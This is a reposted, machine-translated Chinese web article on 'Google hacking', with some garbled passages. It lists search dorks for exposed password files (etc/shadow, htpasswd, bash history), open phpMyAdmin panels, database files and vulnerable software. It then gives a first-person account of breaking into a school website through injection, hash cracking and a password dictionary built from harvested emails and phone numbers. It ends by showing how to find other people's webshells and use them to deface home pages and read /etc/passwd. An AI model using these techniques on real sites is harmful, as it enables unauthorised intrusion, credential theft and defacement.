Google Search Skills

Source: Internet
Author: User
Tags md5 encryption

Enter "index of/" MP3 in the search box

By searching, you can download MP3, RM, and other video works from the website portal!

Enter "index of/" SWF in the search box

By searching, you can download Flash files from the website portal!

* Note that the quotation marks must be in English!

If you enter:

"Index of/" Avi

Enter "index of/" inurl: Lib in the search box
By searching, you will enter many libraries and will be able to download your favorite books.

Enter index of/"CNKI in the search box
By searching, you can find the portals of many libraries, such as CNKI, VIP, and superstar!

Enter "index of/" PPT in the search box
Click search to download the powerpint file!

Enter "index of/" MP3 in the search box
By searching, you can download MP3, RM, and other video works from the website portal!

Enter "index of/" SWF in the search box
By searching, you can download Flash files from the website portal!

Enter "index of/" in the search box to download the software
By searching, you can download the software from the website portal!

Expose some sensitive information to them. Use Google to search for the following content:
Intitle: "index of" etc
Intitle: "index of". sh_history
Intitle: "index of". bash_history
Intitle: "index of" passwd
Intitle: "index of" People. lst
Intitle: "index of" PWD. DB
Intitle: "index of" etc/shadow
Intitle: "index of" spwd
Intitle: "index of" Master. passwd
Intitle: "index of" htpasswd
"#-FrontPage-" inurl: Service. pwd
Sometimes some important password files are exposed to the network without protection for various reasons. If they are obtained by someone with ulterior motives, the harm is very great.
1. Index of MPEG4
3. Index of MP3
4. Index of CNKI
5. Index of rmvb
6. Index of RM
7. Index of movie
8. Index of SwF
9. Index of JPG
10. Index of admin
12. Index of PDF
13. Index of Doc
14. Index of WMV
15. Index of MDB
16. Index of MPG
17. Index of MTV
18. Index of software
19. Index of mov
20. Index of ASF
23. Index of LIB
24. Index of VOD
25. Index of RAR
27. Index of exe
28. Index of ISO
29. Index of video
30. Index of book
31. Index of soft
32. Index of CHM
33. Index of password
34. Index of game
35. Index of music
36. Index of DVD
37. Index of mid
38. Index of ebook
40. Index of Download

Note that the quotation marks must be in English!

What will you find? Similarly, what can we find if we change Avi to MPEG? Haha! I don't need to teach any more next?

---------------------------------------------------------------------------- ++
Simple implementation of Google Hacking
Some Google syntaxes can be used to provide us with more information (and, of course, to those who are used to attack more people they want .), the following describes some common syntaxes.
This means that a character in the body of a webpage is used as a search condition. For example, if you enter intext in Google, the system will return all webpages whose body contains "".

. Allintext: The usage is similar to that of intext.

Similar to the intext above, search for any characters in the webpage title that we are looking for. For example, search: intitle: Security angel. The system will return all web pages whose titles contain "Security Angel ".

Page. Similarly, allintitle: is similar to intitle.

Search for the cache of some content in Google, and sometimes you may find some good stuff.

Search for the definition of a word. Search: Define: hacker. The definition of hacker is returned.

I would like to emphasize on this, whether it's a network-based attack or what we will talk about later on the side of the special survey? Search for files of the specified type. For example, enter

: Filetype: Doc. All file URLs ending with Doc will be returned. Of course, if you are looking for. Bak,. mdb, or. Inc, you can also obtain more information.

Query the basic information of a specified site.

Search whether the specified character exists in the URL. For example, if you enter inurl: Admin, N Connections similar to this will be returned:, which will be used to find the administrator login.

The URL is good. allinurl is similar to inurl, and multiple characters can be specified.

For example, search: inurl: can return all URLs connected to

This is also useful. For example, site: will return all URLs related to this site of

By the way, some * operators are also very useful:
+ Display columns that may be ignored by Google as the query range
-Ignore a word
~ Word of consent
. Single wildcard
* Wildcard, which can represent multiple letters
"" Precise Query
------------------------------------------------ ++

You can also use Google to search for programs with vulnerabilities. For example, zeroboard found a file code leakage vulnerability some time ago. You can use Google to find websites that use this program on the Internet.

Intext: zeroboard filetype: PHP
Or use:
Inurlutlogin. php? _ Zb_path = site:. JP
To find the page we need. phpMyAdmin is a set of powerful database * software, some sites due to configuration errors, we can directly access phpMyAdmin without using the password

Line *. You can use Google to search for program URLs with such vulnerabilities:
Intitle: phpMyAdmin intext: Create new database

Also remember ystem32/cmd.exe? Dir? Search by Google. You may find many more

Antique machines. We can also use this to find pages with other CGI vulnerabilities.
Allinurl: winnt system32

As mentioned above, Google can be used to search for database files. Some syntaxes can be used to precisely search for more things (Access database, MSSQL, MySQL connection files ).

For example:
Allinurl: BBS data
Filetype: MDB inurl: Database
Filetype: Inc Conn
Inurl: Data filetype: MDB
Intitle: "index of" data // This problem often occurs on Apache + Win32 servers with incorrect configuration. Like the above principle, we can use Google to find it.


Google can be used to collect and penetrate information on a site. Next we will use Google to perform a test on a specific site.
First, use Google to check some basic information about the site (some details are omitted ):
Find the domain names of several school departments from the returned information:
By the way, the ping should be performed on different servers. Schools generally have a lot of good information. First, check whether there are any good things.

Site: filetype: Doc
Get n good doc files.

First look for the website management background address:
Site: intext: Management
Site: inurl: Login
Site: intitle: Management
More than 2 Admin backend addresses:
Http:// 88/_ admin/login_in.asp

Pretty good. Let's see what programs are running on the server:
Site: filetype: ASP
Site: filetype: PHP
Site: filetype: aspx
Site: filetype: ASP
Site :.......
On the A2 server, IIS is used, ASP is used, and a PHP Forum is also used.
The A3 server is also IIS, aspx + ASP. Web programs should all be developed by themselves. If you have a forum, you can see if you can meet any public FTP account or something:
Site: intext: ftp ://*:*
No value found. Let's see if there are any upload vulnerabilities:
Site: inurl: File
Site: inurl: Load
A file upload page is found on A2:
I checked it with IE and did not have the access permission. Try injection,
Site: filetype: ASP
Get the address of n asp pages, and let the software do the physical work. This program obviously does not prevent injection, and the dbowner permission is not high, but it is enough, and the back a shell is not very nice.

In addition, it seems that the database is not small, and the password of the web administrator is directly exposed. Then, MD5 encryption is passed. In general, the passwords of school sites are relatively regular, usually domain names +

The transformation of the telephone type should be done with Google.
Site: // obtain N second-level domain names
Site: intext: * @ // get n email addresses and the name of the email owner.
Site: intext: Phone Number // n
Create a dictionary of the information and then run it slowly. After a while, I ran out of four accounts, two of which were from the student union, one administrator, and one possibly from the teacher's account. Login:
Name: website administrator
Pass: a2xxxx7619 // Let's talk about it, that is, the domain name + 4 digits
How to escalate the permission is not discussed in this article.

During this time, I looked at some Google hack research sites outside China. In fact, they are basically using some basic syntaxes flexibly, or working with a Script Vulnerability, mainly relying on

Flexible personal thinking. There are not many defense measures for Google hack in foreign countries, so we are still waiting till now, so don't try to crack it. For some running on Windows
Apache network administrators should pay more attention to this aspect. An intitle: Index of will almost all come out.
1. Search for webshell using PHP

Intitle: "php shell *" "enable stderr" filetype: PHP

(Note: intitle-the webpage title enable stderr-UNIX standard output and the abbreviated filetype-file type for standard errors ). In the search results, you can find many

The Web shell of the command line. If the phpshell you find won't be used, if you are not familiar with Unix, you can directly look at the list, which is not detailed here and has a lot of useful value. Description

Some of the phpshells we searched out here use Unix commands, all of which are functions called by the system (in fact, Baidu and other search engines can be used, just fill in

The write search content is different ). This phpwebshell can directly echo (commonly used Unix Commands ). One sentence:

Echo "summon"> index. jsp

Now let's look at the homepage and change it to "summon.

We can also use wget to upload a file (for example, the leaf you want to replace ). Execute Command and enter cat File> index.html or echo ""> File

Echo "test"> File

In this way, the site homepage is replaced successfully. You can also

Uname-A; CAT/etc/passwd

However, you must note that some webshell programs cannot be executed due to problems,

2. Search for Inc sensitive information

In the Google search box, enter:


. Org filetype: Inc

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.